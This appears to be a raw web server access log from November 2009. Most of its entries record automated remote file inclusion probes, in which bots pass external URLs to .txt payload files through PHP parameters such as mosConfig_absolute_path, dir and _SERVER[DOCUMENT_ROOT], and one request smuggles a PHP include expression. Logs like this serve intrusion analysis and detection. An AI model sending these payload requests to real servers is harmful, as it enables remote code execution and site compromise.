91.121.28.22 - - [26/Nov/2009:00:01:10 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:01:10 -0500] "GET /logs/access_log.Q109102900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:01:10 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:01:11 -0500] "GET /logs/access_log.Q109091100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:00:01:22 -0500] "GET /images/items/index3_whiteburs.jpg HTTP/1.1" 200 2734 "-" "Googlebot-Image/1.0"
74.86.17.106 - - [26/Nov/2009:00:01:27 -0500] "GET /logs/access_log.Q109091100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:01:39 -0500] "GET /logs/access_log.Q109110600%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.24.49.35 - - [26/Nov/2009:00:01:50 -0500] "GET /logs//skin/happycast_category_bluishgreen/ask_password.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
59.24.49.35 - - [26/Nov/2009:00:01:50 -0500] "GET //skin/happycast_category_bluishgreen/ask_password.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
151.12.58.89 - - [26/Nov/2009:00:02:08 -0500] "GET /logs/access_log.Q109093000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:02:09 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:02:09 -0500] "GET /logs/access_log.Q109051500//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:02:11 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
218.38.15.75 - - [26/Nov/2009:00:02:23 -0500] "GET //skin/ggambo6210_board/include/ggambo_setup.php/write.php?dir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:00:02:23 -0500] "GET /logs/access_log.Q109092500//skin/ggambo6210_board/include/ggambo_setup.php/write.php?dir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.38.15.75 - - [26/Nov/2009:00:02:23 -0500] "GET /logs//skin/ggambo6210_board/include/ggambo_setup.php/write.php?dir=http://www.botnik.net/krise/img/mspc/pid.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:02:28 -0500] "GET /logs/access_log.Q109082900//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:02:35 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.171.225.234 - - [26/Nov/2009:00:02:42 -0500] "GET /logs/access_log.Q109082000/phphtml.php?htmlclass_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:02:47 -0500] "GET /logs/access_log.Q109082900//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
95.110.225.160 - - [26/Nov/2009:00:03:28 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usb99.fileave.com/test.txt?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
95.110.225.160 - - [26/Nov/2009:00:03:28 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usb99.fileave.com/test.txt?? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
121.101.214.54 - - [26/Nov/2009:00:03:44 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:03:44 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:03:44 -0500] "GET /logs/access_log.Q109091100%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:04:02 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:04:02 -0500] "GET /logs/access_log.Q109091100%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:04:02 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
151.12.58.89 - - [26/Nov/2009:00:04:45 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:04:45 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:04:45 -0500] "GET /logs/access_log.Q109091900////skin/ggambo7002_board/comment_modify.php?dir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:05:11 -0500] "GET /logs/error_log.Q109110500////skin/ggambo7002_board/comment_modify.php?dir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
121.101.214.54 - - [26/Nov/2009:00:05:20 -0500] "GET /logs/access_log.Q109082900%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:05:41 -0500] "GET /logs/access_log.Q109082900%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
213.171.225.234 - - [26/Nov/2009:00:06:49 -0500] "GET /logs/access_log.Q109052700/phphtml.php?htmlclass_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:07:35 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.12.58.89 - - [26/Nov/2009:00:09:32 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:09:32 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 200 27555 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:09:33 -0500] "GET /logs/error_log.Q109100300////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:09:49 -0500] "GET /logs/access_log.Q109081500////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:09:58 -0500] "GET /logs/error_log.Q109090800%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:09:58 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:09:59 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.195.111.169 - - [26/Nov/2009:00:10:00 -0500] "GET /logs/error_log.Q108060500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.150.177.236 - - [26/Nov/2009:00:10:19 -0500] "GET /logs/access_log.Q109093000///vwar/backup/errors.php?error=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:10:19 -0500] "GET ///vwar/backup/errors.php?error=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:10:19 -0500] "GET /logs///vwar/backup/errors.php?error=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
69.4.32.137 - - [26/Nov/2009:00:10:25 -0500] "GET /logs/access_log.Q109051500/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.4.32.137 - - [26/Nov/2009:00:10:26 -0500] "GET /logs/access_log.Q109060400/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.150.177.236 - - [26/Nov/2009:00:10:39 -0500] "GET /logs/access_log.Q109072500///vwar/backup/errors.php?error=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:11:39 -0500] "GET /logs/access_log.Q109091900///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:11:59 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:12:00 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
78.110.50.112 - - [26/Nov/2009:00:12:07 -0500] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:00:12:08 -0500] "GET ///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:00:12:10 -0500] "GET /logs/error_log.Q109061600%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
64.150.177.236 - - [26/Nov/2009:00:12:15 -0500] "GET /logs/error_log.Q109090800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
78.110.50.112 - - [26/Nov/2009:00:12:16 -0500] "GET /logs/error_log.Q109061600%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:00:12:16 -0500] "GET ///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:00:12:16 -0500] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:12:35 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.112 - - [26/Nov/2009:00:12:36 -0500] "GET /logs/access_log.Q109051500%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
78.110.50.112 - - [26/Nov/2009:00:12:39 -0500] "GET /logs/access_log.Q109051500%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:13:04 -0500] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:13:04 -0500] "GET //skin/ggambo7002_board/basic.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:13:40 -0500] "GET //skin/ggambo7002_board/basic.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:13:40 -0500] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:15:23 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:15:23 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:15:23 -0500] "GET /logs/access_log.Q109102900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:15:50 -0500] "GET /logs/access_log.Q109110600%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:15:52 -0500] "GET /logs/error_log.Q109073100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:15:52 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:15:52 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:15:52 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:16:05 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:16:05 -0500] "GET /logs/error_log.Q109073100//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:16:05 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.86.17.106 - - [26/Nov/2009:00:16:05 -0500] "GET /logs/error_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
151.12.58.89 - - [26/Nov/2009:00:17:13 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
151.12.58.89 - - [26/Nov/2009:00:17:13 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 200 27555 "-" "libwww-perl/5.805"
121.101.214.54 - - [26/Nov/2009:00:17:15 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.zlinske-reality.cz/hosting/modam/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:17:15 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.zlinske-reality.cz/hosting/modam/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:17:15 -0500] "GET /logs/access_log.Q109091100%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.zlinske-reality.cz/hosting/modam/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:17:36 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
113.52.152.25 - - [26/Nov/2009:00:17:40 -0500] "GET /convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
113.52.152.25 - - [26/Nov/2009:00:17:40 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:00:18:18 -0500] "GET /logs/access_log.Q109082900%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.zlinske-reality.cz/hosting/modam/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.150.177.236 - - [26/Nov/2009:00:18:27 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:00:18:27 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
91.121.28.22 - - [26/Nov/2009:00:18:30 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:18:30 -0500] "GET /logs/error_log.Q109110100%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:18:30 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
113.52.152.25 - - [26/Nov/2009:00:18:56 -0500] "GET /logs/access_log.Q109053000%20%20/convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:20:40 -0500] "GET /logs/error_log.Q109092200%20%20///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:20:40 -0500] "GET /logs///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:20:40 -0500] "GET ///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:20:40 -0500] "GET /logs/access_log.Q109082900%20%20///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:21:35 -0500] "GET //index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:22:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.70 - - [26/Nov/2009:00:23:18 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.65 - - [26/Nov/2009:00:25:16 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
210.127.209.27 - - [26/Nov/2009:00:25:41 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:41 -0500] "GET /logs/access_log.Q109062800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:41 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:47 -0500] "GET /logs/access_log.Q109081500/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:50 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:50 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:50 -0500] "GET /logs/access_log.Q109062800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:25:50 -0500] "GET /logs/access_log.Q109081500/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:25:53 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:25:53 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:25:53 -0500] "GET /logs/access_log.Q109053000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:26:56 -0500] "GET /logs/error_log.Q109110100//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:27:05 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:27:05 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:27:06 -0500] "GET /logs/error_log.Q109110100%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.28.22 - - [26/Nov/2009:00:27:13 -0500] "GET /logs/error_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.70.35.48 - - [26/Nov/2009:00:27:25 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:27:41 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.130.149.241 - - [26/Nov/2009:00:27:52 -0500] "GET /convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:00:27:52 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:00:28:33 -0500] "GET /logs/error_log.Q109070600%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
